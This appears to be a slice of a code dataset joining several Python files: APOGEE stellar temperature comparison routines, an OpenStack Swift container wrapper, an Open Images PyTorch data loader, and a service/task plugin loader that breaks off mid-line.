fit.fit2d(mh,teff,teff-ghb,reject=0,plot=ax2,zr=[-500,200],xt='[M/H]',yt=['Teff'],zt='$\\Delta Teff$')\n #pfit = fit.fit2d(allstar[param][:,3],allstar[param][:,0],allstar[param][:,0]-ghb,plot=ax[0,0],zr=[-500,200],xt='[M/H]',yt=['Teff'],zt='$\\Delta Teff$')\n #ejk=np.clip(np.sqrt(allstar['J_ERR']**2+allstar['K_ERR']**2),0.,0.02)\n #errpar = err.errfit(teff,allstar['SNR'],mh,teff-tefit(mh)-ghb,title='Teff',out=out+'_phot',zr=[0,250],meanerr=abs(dtdjk)*ejk)\n errpar = err.errfit(teff,allstar['SNR'],mh,teff-tefit(mh)-ghb,title='Teff',out=out,zr=[0,150])\n\n x=np.linspace(-3,1,200)\n rms = (teff-tefit(mh)-ghb).std()\n if dr13: \n plots.plotl(ax,x,-36.17+95.97*x-15.09*x**2,color='k')\n print(allfit)\n else :\n plots.plotl(ax,x,tefit(x),color='k')\n ax.text(0.98,0.9,'rms: {:6.1f}'.format(rms),transform=ax.transAxes,ha='right')\n\n cmap = matplotlib.cm.get_cmap(cmap)\n for t in np.arange(trange[0],trange[1],500.) :\n rgba=cmap((t-trange[0])/(trange[1]-trange[0]))\n y=x*0.+t\n plots.plotl(ax,x,tefit2(x,y),color=rgba)\n\n plots._data_x = mh\n plots._data_y = teff-ghb\n plots._data = allstar\n plots.event(fig)\n\n # separate fits for low/hi alpha/M if requested\n if alpha :\n gdlo=apselect.select(allstar,badval=['STAR_BAD'],teff=trange,mh=mhrange,logg=[0,3.8],alpha=[-0.1,0.1],raw=True)\n mean=bindata(mh[gdlo],teff[gdlo]-ghb[gdlo],bins)\n plots.plotp(ax,bins,mean,marker='o',size=40,color='g')\n tmpfit = fit.fit1d(mh[gdlo],teff[gdlo]-ghb[gdlo],ydata=teff[gdlo],degree=2)\n plots.plotl(ax,x,tmpfit(x))\n print('low alpha: ', len(gdlo))\n\n gdhi=apselect.select(allstar,badval=['STAR_BAD'],teff=trange,mh=mhrange,logg=[0,3.8],alpha=[0.1,0.5],raw=True)\n mean=bindata(mh[gdhi],teff[gdhi]-ghb[gdhi],bins)\n plots.plotp(ax,bins,mean,marker='o',size=40,color='b')\n tmpfit = fit.fit1d(mh[gdhi],teff[gdhi]-ghb[gdhi],ydata=teff[gdhi],degree=2)\n plots.plotl(ax,x,tmpfit(x))\n print('hi alpha: ', len(gdhi))\n\n fig.tight_layout()\n fig.savefig(out+'.png')\n plt.close()\n plt.rc('font',size=14)\n plt.rc('axes',titlesize=14)\n plt.rc('axes',labelsize=14)\n fig.savefig(out+'.pdf')\n plt.close()\n\n # auxiliary plots with different color-codings\n try:\n meanfib=allstar['MEANFIB']\n except:\n meanfib=teff*0.\n fig,ax=plots.multi(2,2,hspace=0.001,wspace=0.001)\n plots.plotc(ax[0,0],mh,teff-ghb,logg,zr=[0,5],xr=xr,yr=yr,xt='[M/H]',yt='ASPCAP-photometric Teff',colorbar=True,zt='log g')\n plots.plotc(ax[0,1],mh,teff-ghb,meanfib,zr=[0,300],xr=xr,yr=yr,xt='[M/H]',yt='ASPCAP-photometric Teff',colorbar=True,zt='mean fiber')\n pfit = fit.fit1d(mh,teff-ghb,ydata=teff,plot=ax[1,0],zr=[-500,200],xt='[M/H]',yt='$\\Delta Teff$',xr=[-2.7,0.9],yr=[3500,5000],colorbar=True,zt='Teff')\n pfit = fit.fit1d(teff,teff-ghb,ydata=mh,plot=ax[1,1],zr=[-500,200],xt='Teff',xr=trange,yr=[-2.5,0.5],colorbar=True,zt='[M/H]')\n fig.tight_layout()\n fig.savefig(out+'_b.png')\n plt.close()\n \n # do some test 2D and 1D fits and plots \n #fig,ax=plots.multi(2,2,hspace=0.5,wspace=0.001)\n #ax[0,1].xaxis.set_visible(False)\n #ax[0,1].yaxis.set_visible(False)\n #pfit = fit.fit2d(allstar[param][:,3],allstar[param][:,0],allstar[param][:,0]-ghb,plot=ax[0,0],zr=[-500,200],xt='[M/H]',yt=['Teff'],zt='$\\Delta Teff$')\n #pfit = fit.fit1d(allstar[param][:,3],allstar[param][:,0]-ghb,ydata=allstar[param][:,0],plot=ax[1,0],zr=[-500,200],xt='[M/H]',yt='$\\Delta Teff$',xr=[-2.7,0.9],yr=[3500,5000])\n #pfit = fit.fit1d(allstar[param][:,0],allstar[param][:,0]-ghb,ydata=allstar[param][:,3],plot=ax[1,1],zr=[-500,200],xt='Teff',xr=[3900,5100],yr=[-2.5,0.5])\n plt.draw()\n return {'caltemin': 3000., 'caltemax': 10000., 'temin' : trange[0], 'temax': trange[1], \n 'mhmin': mhrange[0], 'mhmax' : mhrange[1],\n 'par': tefit.parameters, 'rms' :rms, 'par2d': tefit2.parameters, 'errpar' : errpar}\n\n\ndef irfm(allstar,trange=[4000,5000],mhrange=[-2.5,0.75],out='dteff') :\n '''\n Compares allstar ASPCPAP Teff with various photometric Teff from JAJ compilation (SAGA, CL, TH, SFD)\n Does fits \n\n Args:\n allstar : allStar structure\n\n '''\n\n # select stars\n gd=apselect.select(allstar,badval=['STAR_BAD'],teff=trange,mh=mhrange,raw=True)\n allstar=allstar[gd]\n\n # get IRFM data\n irfm=fits.open(os.environ['APOGEE_DIR']+'/data/calib/irfm_temp.fits')[1].data\n\n # get the subsamples and match. Note that we have to do this separately for each subsample because some\n # stars appear in more than one subsample\n saga=np.where(irfm['SOURCE'] == 'SAGA')[0]\n saga1,saga2=match.match(np.chararray.strip(allstar['APOGEE_ID']),np.chararray.strip(irfm['2MASS ID'][saga]))\n cl=np.where(irfm['SOURCE'] == 'CL')[0]\n cl1,cl2=match.match(np.chararray.strip(allstar['APOGEE_ID']),np.chararray.strip(irfm['2MASS ID'][cl]))\n th=np.where(irfm['SOURCE'] == 'TH')[0]\n th1,th2=match.match(np.chararray.strip(allstar['APOGEE_ID']),np.chararray.strip(irfm['2MASS ID'][th]))\n sfd=np.where(irfm['SOURCE'] == 'SFD')[0]\n sfd1,sfd2=match.match(np.chararray.strip(allstar['APOGEE_ID']),np.chararray.strip(irfm['2MASS ID'][sfd]))\n\n # plot diff color-coded by gravity as f([M/H])\n fig,ax=plots.multi(2,2,hspace=0.001,wspace=0.001)\n xr=[-3.0,1.0]\n yr=[-400,300]\n zr=[3500,6000]\n bins=np.arange(-2.5,0.75,0.25)\n\n # SAGA\n plots.plotc(ax[0,0],allstar['FPARAM'][saga1,3],allstar['FPARAM'][saga1,0]-irfm['IRFM TEFF'][saga[saga2]],allstar['FPARAM'][saga1,0],zr=zr,xr=xr,yr=yr,xt='[M/H]',yt='ASPCAP-photometric Teff')\n mean=bindata(allstar['FPARAM'][saga1,3],allstar['FPARAM'][saga1,0]-irfm['IRFM TEFF'][saga[saga2]],bins)\n plots.plotp(ax[0,0],bins,mean,marker='o',size=40)\n ax[0,0].text(0.1,0.9,'SAGA',transform=ax[0,0].transAxes)\n\n # CL\n plots.plotc(ax[0,1],allstar['FPARAM'][cl1,3],allstar['FPARAM'][cl1,0]-irfm['IRFM TEFF'][cl[cl2]],allstar['FPARAM'][cl1,0],zr=zr,xr=xr,yr=yr,xt='[M/H]')\n mean=bindata(allstar['FPARAM'][cl1,3],(allstar['FPARAM'][cl1,0]-irfm['IRFM TEFF'][cl[cl2]]),bins)\n plots.plotp(ax[0,1],bins,mean,marker='o',size=40)\n ax[0,1].text(0.1,0.9,'CL',transform=ax[0,1].transAxes)\n\n # TH\n plots.plotc(ax[1,0],allstar['FPARAM'][th1,3],allstar['FPARAM'][th1,0]-irfm['IRFM TEFF'][th[th2]],allstar['FPARAM'][th1,0],zr=zr,xr=xr,yr=yr,xt='[M/H]',yt='ASPCAP-photometric Teff')\n mean=bindata(allstar['FPARAM'][th1,3],(allstar['FPARAM'][th1,0]-irfm['IRFM TEFF'][th[th2]]),bins)\n plots.plotp(ax[1,0],bins,mean,marker='o',size=40)\n ax[1,0].text(0.1,0.9,'TH',transform=ax[1,0].transAxes)\n\n # SFD\n plots.plotc(ax[1,1],allstar['FPARAM'][sfd1,3],allstar['FPARAM'][sfd1,0]-irfm['IRFM TEFF'][sfd[sfd2]],allstar['FPARAM'][sfd1,0],zr=zr,xr=xr,yr=yr,xt='[M/H]')\n mean=bindata(allstar['FPARAM'][sfd1,3],(allstar['FPARAM'][sfd1,0]-irfm['IRFM TEFF'][sfd[sfd2]]),bins)\n plots.plotp(ax[1,1],bins,mean,marker='o',size=40)\n ax[1,1].text(0.1,0.9,'SFD',transform=ax[1,1].transAxes)\n\n fig.savefig(out+'_mh.png')\n\n # plot diff color-coded by gravity as f([M/H])\n fig,ax=plots.multi(2,2,hspace=0.001,wspace=0.001)\n zr=[-2.0,0.5]\n yr=[-400,300]\n xr=[6000,3500]\n bins=np.arange(3500,5500,250)\n\n # SAGA\n plots.plotc(ax[0,0],allstar['FPARAM'][saga1,0],allstar['FPARAM'][saga1,0]-irfm['IRFM TEFF'][saga[saga2]],allstar['FPARAM'][saga1,3],zr=zr,xr=xr,yr=yr,xt='Teff',yt='ASPCAP-photometric Teff')\n mean=bindata(allstar['FPARAM'][saga1,0],(allstar['FPARAM'][saga1,0]-irfm['IRFM TEFF'][saga[saga2]]),bins)\n plots.plotp(ax[0,0],bins,mean,marker='o',size=40)\n ax[0,0].text(0.1,0.9,'SAGA',transform=ax[0,0].transAxes)\n\n # CL\n plots.plotc(ax[0,1],allstar['FPARAM'][cl1,0],allstar['FPARAM'][cl1,0]-irfm['IRFM TEFF'][cl[cl2]],allstar['FPARAM'][cl1,3],zr=zr,xr=xr,yr=yr,xt='Teff')\n mean=bindata(allstar['FPARAM'][cl1,0],(allstar['FPARAM'][cl1,0]-irfm['IRFM TEFF'][cl[cl2]]),bins)\n plots.plotp(ax[0,1],bins,mean,marker='o',size=40)\n ax[0,1].text(0.1,0.9,'CL',transform=ax[0,1].transAxes)\n\n # TH\n plots.plotc(ax[1,0],allstar['FPARAM'][th1,0],allstar['FPARAM'][th1,0]-irfm['IRFM TEFF'][th[th2]],allstar['FPARAM'][th1,3],zr=zr,xr=xr,yr=yr,xt='Teff',yt='ASPCAP-photometric Teff')\n mean=bindata(allstar['FPARAM'][th1,0],(allstar['FPARAM'][th1,0]-irfm['IRFM TEFF'][th[th2]]),bins)\n plots.plotp(ax[1,0],bins,mean,marker='o',size=40)\n ax[1,0].text(0.1,0.9,'TH',transform=ax[1,0].transAxes)\n\n # SFD\n plots.plotc(ax[1,1],allstar['FPARAM'][sfd1,0],allstar['FPARAM'][sfd1,0]-irfm['IRFM TEFF'][sfd[sfd2]],allstar['FPARAM'][sfd1,3],zr=zr,xr=xr,yr=yr,xt='Teff')\n mean=bindata(allstar['FPARAM'][sfd1,0],(allstar['FPARAM'][sfd1,0]-irfm['IRFM TEFF'][sfd[sfd2]]),bins)\n plots.plotp(ax[1,1],bins,mean,marker='o',size=40)\n ax[1,1].text(0.1,0.9,'SFD',transform=ax[1,1].transAxes)\n\n fig.savefig(out+'_teff.png')\n\n # do 2D fits with Teff and [M/H], and 1D fits with each\n\n fig,ax=plots.multi(2,2,hspace=0.5,wspace=0.001)\n ax[0,1].xaxis.set_visible(False)\n ax[0,1].yaxis.set_visible(False)\n pfit = fit.fit2d(ax[0,0],allstar['FPARAM'][sfd1,3],allstar['FPARAM'][sfd1,0],allstar['FPARAM'][sfd1,0]-irfm['IRFM TEFF'][sfd[sfd2]],plot=True,zr=[-500,200],xt='[M/H]',yt=['Teff'],zt='$\\Delta Teff$')\n pfit = fit.fit1d(ax[1,0],allstar['FPARAM'][sfd1,3],allstar['FPARAM'][sfd1,0]-irfm['IRFM TEFF'][sfd[sfd2]],ydata=allstar['FPARAM'][sfd1,0],plot=True,zr=[-500,200],xt='[M/H]',yt='$\\Delta Teff$',xr=[-2.7,0.9],yr=[3500,5000])\n pfit = fit.fit1d(ax[1,1],allstar['FPARAM'][sfd1,0],allstar['FPARAM'][sfd1,0]-irfm['IRFM TEFF'][sfd[sfd2]],ydata=allstar['FPARAM'][sfd1,3],plot=True,zr=[-500,200],xt='Teff',xr=[3900,5100],yr=[-2.5,0.5])\n\n pdb.set_trace()\n\n return pfit\n\n\ndef dr13dr12() :\n '''\n compare dr13 dr12 Teff\n '''\n\n dr12load=apload.ApLoad(dr='dr12')\n dr12=dr12load.allStar()[1].data\n dr13load=apload.ApLoad(dr='dr13')\n dr13=dr13load.allStar()[1].data\n i1,i2 = match.match(dr12['APOGEE_ID'],dr13['APOGEE_ID'])\n dr12=dr12[i1]\n dr13=dr13[i2]\n\n fig,ax=plots.multi(1,2,hspace=0.001,wspace=0.001)\n plots.plotc(ax[0],dr13['M_H'],dr13['TEFF']-dr12['TEFF'],dr13['TEFF'],xr=[-2.5,0.75],yr=[-300,300],zr=[3500,5000])\n\n plots.plotc(ax[1],dr13['TEFF'],dr13['TEFF']-dr12['TEFF'],dr13['M_H'],xr=[6500,3000],yr=[-300,300],zr=[-2,0.5])\n\ndef cte_ghb(jk0,feh,dwarf=False) :\n \"\"\"\n Color-temperature relation from Gonzalez Hernandez & Bonifacio (2009): (J-K)_0 - Teff\n \"\"\"\n if dwarf :\n b0=0.6524 ; b1=0.5813 ; b2=0.1225 ; b3=-0.0646 ; b4=0.0370 ; b5=0.0016 # dwarfs\n else :\n b0=0.6517 ; b1=0.6312 ; b2=0.0168 ; b3=-0.0381 ; b4=0.0256 ; b5=0.0013 # giants\n theta=b0+b1*jk0+b2*jk0**2+b3*jk0*feh+b4*feh+b5*feh**2\n dtheta_djk = b1+2*b2*jk0+b3*feh\n dt_djk= -5040./theta**2*dtheta_djk\n\n return 5040./theta, dt_djk\n\n","sub_path":"python/apogee/aspcap/teffcomp.py","file_name":"teffcomp.py","file_ext":"py","file_size_in_byte":15424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"78825545","text":"# Copyright 2017 IBM Corporation\n# Copyright 2017 The Johns Hopkins University\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import, print_function\nfrom swiftclient.service import SwiftError\nfrom core.objectstore.store import Store\n\nclass Container(object):\n\n def __init__(self, container_name):\n # create swift service\n self._object_store = Store.load()\n self._name = container_name\n\n @property\n def name(self):\n return self._name\n\n def create(self):\n \"\"\"Create a container\"\"\"\n \n try:\n self._object_store._service.post(self.name)\n except SwiftError as e:\n print(e)\n raise e\n \n def update(container_name):\n \"\"\"Update a container metadata\"\"\"\n return NotImplemented \n\n def delete(self):\n \"\"\"Delete a container\"\"\"\n\n try:\n response = self._object_store._service.delete(container=self.name)\n for page in response:\n continue\n except SwiftError as e:\n print(e)\n raise e\n\n @staticmethod\n def list():\n \"\"\"List containers\"\"\"\n \n object_store = Store.load()\n try:\n response = object_store._service.list()\n except SwiftError as e:\n print(e)\n raise e\n for page in response:\n for container in page['listing']:\n yield Container(container['name'])\n","sub_path":"objectfs/core/data/.old/swift/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"560918279","text":"#-*-coding:utf-8-*-\n\nimport torch.utils.data as tdata\nimport os\nfrom PIL import Image\nimport numpy as np\nimport pandas as pd\nfrom config import cfg\nimport json\n\n\ndef read_descriptions():\n data = pd.read_csv(os.path.join(cfg.FILE.BASE_PATH,\n cfg.FILE.CLASS_DESCRIPTION))\n class2Name = {}\n class2Name[\"/m/061hd_\"] = \"Infant bed\"\n for _, row in data.iterrows():\n class2Name[row[\"/m/061hd_\"]] = row[\"Infant bed\"]\n return class2Name\n\n\ndef load_class(classes):\n class2idx = dict(((cls, idx) for idx, cls in enumerate(classes)))\n return class2idx\n\n\ndef analyse_hierarchy_old(json_dir):\n json_file = open(os.path.join(cfg.FILE.BASE_PATH, json_dir))\n json_dict = json.load(json_file)\n labelName = cfg.BBOX.CSV_LABELNAME\n subcategory = \"Subcategory\"\n classes = [json_dict[labelName]]\n\n def _handle_list(json_list):\n for json_dict in json_list:\n classes.append(json_dict[labelName])\n\n for js_dict in json_list:\n sub = js_dict.get(subcategory, None)\n if sub:\n _handle_list(sub)\n\n _handle_list(json_dict[subcategory])\n return classes\n\n\ndef old_idx_class_map():\n classes = analyse_hierarchy_old(cfg.FILE.CLASS_HIERARCHY_FILE)\n class2idx = load_class(classes)\n return class2idx\n\n\ndef old2new(new):\n o2n = {}\n old = old_idx_class_map()\n for cls in new:\n o2n[old[cls]] = new[cls]\n return o2n\n\n\ndef analyse_hierarchy(json_dir, class2idx):\n json_file = open(os.path.join(cfg.FILE.BASE_PATH, json_dir))\n json_dict = json.load(json_file)\n lableName = cfg.BBOX.CSV_LABELNAME\n subcategory = \"Subcategory\"\n hierarchy = {}\n\n stack = []\n\n def _analyse_hierarchy(json_dict):\n cls = json_dict[lableName]\n if subcategory in json_dict:\n if cls in class2idx:\n stack.append(cls)\n for json_obj in json_dict[subcategory]:\n _analyse_hierarchy(json_obj)\n\n if cls in class2idx:\n stack.pop(-1)\n\n if cls in class2idx:\n temp = []\n temp.extend(stack)\n if cls in hierarchy:\n hierarchy[cls].extend(temp)\n else:\n hierarchy[cls] = temp\n _analyse_hierarchy(json_dict)\n return hierarchy\n\n\ndef get_multi_labels_hierarchy_and_classes():\n class2idx, class2Name = handle_class()\n hi = analyse_hierarchy(cfg.FILE.CLASS_HIERARCHY_FILE, class2idx)\n class2idx = dict(((key, idx) for idx, key in enumerate(hi.keys())))\n idx2class = dict(((idx, key) for idx, key in enumerate(hi.keys())))\n hidx = {}\n for key in hi:\n hidx[class2idx[key]] = [class2idx[x] for x in hi[key]]\n return class2idx, idx2class, class2Name, hidx\n\n\ndef handle_class():\n class2Name = read_descriptions()\n classes = class2Name.keys()\n class2idx = load_class(classes)\n return class2idx, class2Name\n\n\ndef multi_label_handler(annotations, hierarchy):\n size = annotations.shape[0]\n labels = []\n for i in range(size):\n temp = int(annotations[i, 0])\n label = [temp]\n label.extend(hierarchy[temp])\n label = np.array(label, dtype=int)\n labels.append(label)\n return labels\n\n\nclass TestLoader(tdata.Dataset):\n\n @staticmethod\n def load_image_item(file):\n return Image.open(file).convert(\"RGB\")\n\n def __init__(self, root, transform=None):\n super(TestLoader, self).__init__()\n\n self.root = root\n self.images_dir = os.path.join(root, \"test\")\n self.transform = transform\n\n if not os.path.exists(self.images_dir):\n raise OSError(\"...\")\n\n count = 0\n with os.scandir(self.images_dir) as scanner:\n for _ in scanner:\n count += 1\n numbers = count\n\n self.numbers = numbers\n\n def __len__(self):\n return self.numbers\n\n def search_file(self, item):\n select_file = None\n with os.scandir(self.images_dir) as scanner:\n for idx, entry in enumerate(scanner):\n if idx == item:\n select_file = entry.name\n if not select_file:\n raise RuntimeError(\"search image failed!\")\n return select_file.replace(\".jpg\", \"\")\n\n def load_data(self, idx):\n file_info = self.search_file(idx)\n image_file = os.path.join(self.images_dir, \"{}.jpg\".format(file_info))\n image = self.load_image_item(image_file)\n return file_info, image\n\n def __getitem__(self, item):\n file_info, image = self.load_data(item)\n info = None\n\n if self.transform is not None:\n image, info = self.transform(image, None)\n\n return file_info, image, info\n\n\nclass ImageLoader(tdata.Dataset):\n\n def get_length(self):\n raise NotImplementedError\n\n def __init__(self,\n root,\n dataset=\"train\",\n transforms=None,\n help_file=None):\n super(ImageLoader, self).__init__()\n\n self.root = root\n self.dataset = dataset\n self.transforms = transforms\n\n self.images_dir = os.path.join(root, dataset)\n self.ann_dir = os.path.join(root, \"labels/{}\".format(dataset))\n if not os.path.exists(self.root) or not os.path.exists(self.ann_dir):\n raise OSError(\"the folder {} or {} is not exist!\".format(self.images_dir,\n self.ann_dir))\n self.help_file = help_file\n\n if not self.help_file:\n count = 0\n with os.scandir(self.ann_dir) as scanner:\n for _ in scanner:\n count += 1\n numbers = count\n else:\n numbers = self.get_length()\n self.numbers = numbers\n\n self.class2idx, self.idx2class, self.class2name, self.label_hierarchy = self.load_classes()\n\n def judge_similar(self, a, b):\n \"\"\"\n 返回顺序:父 子\n :param a:\n :param b:\n :return:\n \"\"\"\n a_h = self.label_hierarchy[a]\n b_h = self.label_hierarchy[b]\n if b in a_h:\n return b, a\n if a in b_h:\n return a, b\n return -1, -1\n\n def __len__(self):\n return self.numbers\n\n def __getitem__(self, item):\n image, annotation = self.load_data(item)\n\n if self.transforms is not None:\n image, annotation = self.transforms(image, annotation)\n\n return image, annotation\n\n def search_file(self, item):\n select_file = None\n with os.scandir(self.ann_dir) as scanner:\n for idx, entry in enumerate(scanner):\n if idx == item:\n select_file = entry.name\n if not select_file:\n raise RuntimeError(\"search image failed!\")\n return select_file.replace(\".txt\", \"\")\n\n def handle_multi_label(self, anns):\n return multi_label_handler(anns, self.label_hierarchy)\n\n @staticmethod\n def load_image_item(file):\n return Image.open(file).convert(\"RGB\")\n\n @staticmethod\n def load_annotations_item(file):\n return np.loadtxt(file, ndmin=2, dtype=np.float32)\n\n def load_classes(self):\n cls2idx, idx2cls, cls2Name, hi = get_multi_labels_hierarchy_and_classes()\n return cls2idx, idx2cls, cls2Name, hi\n\n @staticmethod\n def handle_annotations(image, annotations):\n width, height = image.size\n annotations[:, 1:3] *= width\n annotations[:, 3:] *= height\n\n # [x, x1, x2, y1, y2] -> [x, x1, y1, x2, y2]\n bbox = np.zeros((annotations.shape[0], 5), dtype=np.float32)\n bbox[:, 1] += annotations[:, 1]\n bbox[:, 4] += annotations[:, 4]\n bbox[:, 2] += annotations[:, 3]\n bbox[:, 3] += annotations[:, 2]\n # bbox[:, 1::3] += annotations[:, 1::3]\n # bbox[:, 2:4] += annotations[:, 3:1:-1]\n bbox[:, 0] += annotations[:, 0]\n return bbox\n\n def load_data(self, idx):\n file_info = self.search_file(idx)\n image_file = os.path.join(self.images_dir, \"{}.jpg\".format(file_info))\n ann_file = os.path.join(self.ann_dir, \"{}.txt\".format(file_info))\n image = self.load_image_item(image_file)\n annotations = self.load_annotations_item(ann_file)[:, 0:5]\n annotations = self.handle_annotations(image, annotations)\n return image, annotations\n\n def get_label(self, idx):\n return self.class2name[self.idx2class[idx]]\n\n\nclass TrainLoader(ImageLoader):\n \"\"\"\n 因为在处理oid数据集时因为处理过于庞大的数据集使得oid训练集被分割为多个子数据集,为了\n 解决由此带来的图片标注加载和由于处理类别层次结构而犯下的错误,我不得不使用该类来加载\n 训练集数据。而验证集和测试集并不存在上述问题,请仍然使用父类ImageLoader。在未来,\n 如果有时间,请重新生成训练集标注文件。\n \"\"\"\n def __init__(self,\n root,\n transforms=None,\n help_file=None):\n self._idx_dict = {}\n super(TrainLoader, self).__init__(root, \"train\", transforms, help_file)\n\n def __len__(self):\n return self.numbers\n\n def get_length(self):\n file = open(self.help_file)\n lines = file.readlines()\n\n acc = 0\n for line in lines:\n idx, length = line.split(\" \")\n length.replace(\"\\\\n\", \"\")\n length = int(length)\n self._idx_dict[acc] = idx\n acc += length\n file.close()\n return acc\n\n def search_file(self, item):\n idxs = list(self._idx_dict.keys())\n # print(self._idx_dict)\n idxs.sort(reverse=True)\n select_key = None\n relative_idx = 0\n i = None\n for i in idxs:\n if item >= i:\n select_key = self._idx_dict[i]\n relative_idx = item - i\n break\n images_dir = \"train_{}\".format(select_key)\n select_file = None\n with os.scandir(os.path.join(self.ann_dir, images_dir)) as scanner:\n for idx, entry in enumerate(scanner):\n if idx == relative_idx:\n select_file = entry.name\n break\n if not select_file:\n raise RuntimeError(\"search image failed, can not find {} group files in\"\n \" file {}\".format(item, self._idx_dict[i]))\n select_file = \"{}/{}\".format(images_dir, select_file.replace(\".txt\", \"\"))\n return select_file\n\n def fix_label_error(self, annotations):\n for i in range(annotations.shape[0]):\n annotations[i, 0] = self.o2n[int(annotations[i, 0])]\n\n def load_data(self, idx):\n image, anns = super(TrainLoader, self).load_data(idx)\n self.fix_label_error(anns)\n # labels_hierarchy = multi_label_handler(anns, self.label_hierarchy)\n return image, anns\n\n def load_classes(self):\n cls2idx, idx2cls, cls2Name, hi = super(TrainLoader, self).load_classes()\n self.o2n = old2new(cls2idx)\n\n return cls2idx, idx2cls, cls2Name, hi\n\n\nif __name__ == \"__main__\":\n\n from config import cfg\n from utils.visualization import plt_bboxes\n root_path = cfg.FILE.BASE_PATH\n trains = TrainLoader(os.path.join(root_path, \"data/oid\"),\n help_file=os.path.join(root_path, \"data/train_info.txt\"))\n vals = ImageLoader(os.path.join(root_path, \"data/oid\"), \"validation\")\n print(vals.idx2class)\n print(trains.class2name[trains.idx2class[47]])\n # for i in range(20):\n # image, anns = trains[i]\n # plt_bboxes(image, anns, trains)\n","sub_path":"datasets/oid.py","file_name":"oid.py","file_ext":"py","file_size_in_byte":11726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"11640553","text":"import os\nimport sys\nimport imp\nimport inspect\nimport pkgutil\nimport logging\n\nfrom gloria.service import decorator\nfrom gloria.service.runnable import Service\n\n\nclass Loader:\n \"\"\"\n TODO:\n ########################################################################\n # 1. More comments\n ########################################################################\n Put a few words on how tasks get 'loaded':\n how we search in a directory,\n how __import__ trigers the decorator,\n how we rely on the decorator to notify us when a class is being wrapped,\n and so on...\n\n ########################################################################\n # 2. Implement dependencies...\n ########################################################################\n \"\"\"\n global_loaded_tasks = set()\n\n def __init__(self, tasks_dir=''):\n self._tasks_dir = tasks_dir\n\n if tasks_dir not in sys.path:\n sys.path.append(tasks_dir)\n\n self._loaded_tasks = []\n\n # Set up a callback for our decorator to call,\n # when task class is being wrapped\n decorator.on_task_wrapped = self._on_wrapped\n\n def tasks(self):\n return self._loaded_tasks\n\n def load_tasks(self):\n logging.info('Inspecting directory [{0}] for tasks'.format(self._tasks_dir))\n possible_tasks = list(pkgutil.walk_packages(path=[self._tasks_dir]))\n\n if not possible_tasks:\n logging.warning('Didn\\'t find any tasks, skipping')\n return 0\n\n logging.info('Found {0} possible tasks, trying to import them'.format(len(possible_tasks)))\n\n for loader, task, ispkg in possible_tasks:\n if not ispkg:\n self._import_task(task)\n\n self._log_loaded_tasks()\n return len(self._loaded_tasks)\n\n def _on_wrapped(self, wrapped_task):\n logging.debug('task wrapped: {0}'.format(type(wrapped_task)))\n self._loaded_tasks.append(\n (wrapped_task,\n self._task_properties_dict(wrapped_task, decorator.Property),\n self._task_properties_dict(wrapped_task, decorator.Command))\n )\n\n def _task_properties_dict(self, klass, decorator_type):\n props = filter(lambda m: isinstance(m[1], decorator_type), inspect.getmembers(klass))\n logging.debug('props: {0}'.format(props))\n return dict(props)\n\n def _log_loaded_tasks(self):\n if len(self._loaded_tasks) == 0:\n logging.warning('No tasks were loaded')\n return\n\n logging.info('#' * 30)\n logging.info('Loaded {0} tasks:'.format(len(self._loaded_tasks)))\n logging.info('#' * 30)\n\n def _log_task(klass, prop, commands):\n logging.info('Task:')\n logging.info('... class name=\"{0}\"'.format(klass.__name__))\n logging.info('... description=\"{0}\"'.format(klass.__doc__ if klass.__doc__ is not None else 'No description available'))\n logging.info('... enabled={0}'.format(klass.enabled))\n logging.info('... autostart={0}'.format(klass.autostart))\n logging.info('... respawn={0}'.format(klass.respawn))\n #logging.info('... properties: {0}'.format(properties))\n\n for k, p, c in self._loaded_tasks:\n _log_task(k, p, c)\t\n\n def _import_task(self, task):\n logging.info('... importing task [{0}]'.format(task))\n try:\n # If the task is decorated with task,\n # this decoration will cause on_wrapped to be called.\n imported_task = __import__(task, fromlist=[task])\n logging.debug(imported_task.__name__)\n\n if imported_task.__name__ in Loader.global_loaded_tasks:\n reload(imported_task)\n\n Loader.global_loaded_tasks.add(imported_task.__name__)\n\n except ImportError as err:\n logging.error('Can\\'t import [{0}]: {1}'.format(task, err))\n\n\nclass ServiceLoader:\n def __init__(self, services_dirs=[]):\n self._loaded_services = []\n self._services_dirs = services_dirs\n self._tasks_dir = None\n\n # Set up a callback for our decorator to call,\n # when service class is beign wrapped\n decorator.on_service_wrapped = self._on_wrapped\n\n def load_services(self):\n for svc_dir in self._services_dirs:\n self.load_service(svc_dir)\n\n def load_service(self, service_dir):\n logging.info('Inspecting directory [{0}] for services'.format(service_dir))\n\n if self._is_init_py_present(service_dir):\n self._log_and_call(self._import_init_py, service_dir, '__init__.py is present')\n else:\n self._log_and_call(self._decorate_dummy_service, service_dir, '__init__.py is not present, using default service')\n\n def _log_and_call(self, func, param, log_msg):\n logging.info(log_msg)\n func(param)\n\n # Make ServiceLoader iteratable\n # i.e., make it possible to iterate over loaded services\n def __iter__(self):\n self.it = iter(self._loaded_services)\n return self\n\n def __len__(self):\n return len(self._loaded_services)\n\n def __next__(self):\n return next(self.it)\n\n def _is_init_py_present(self, service_dir):\n return True if '__init__.py' in os.listdir(service_dir) else False\n\n def _import_init_py(self, service_dir):\n logging.info('... importing service __init__.py')\n try:\n sys.path.append(service_dir)\n imported_init_py = imp.load_module(service_dir, *imp.find_module('__init__', [service_dir]))\n except ImportError as err:\n logging.error('Can\\'t import __init__.py: {0}'.format(err))\n\n def _decorate_dummy_service(self, service_dir):\n \"\"\"\n Create dummy service and decorate it with the default tasks directories\n (i.e., scan all the subdirectories in service_dir and try to import all the files in each subdirectory)\n \"\"\"\n tasks_dirs = []\n for tasks_dir in [d for d in os.listdir(service_dir) if os.path.isdir(os.path.join(service_dir, d))]:\n tasks_dirs.append(service_dir + '/' + tasks_dir)\n\n decorator.service(tasks_dirs)(Service, os.path.basename(service_dir))\n\n def _on_wrapped(self, 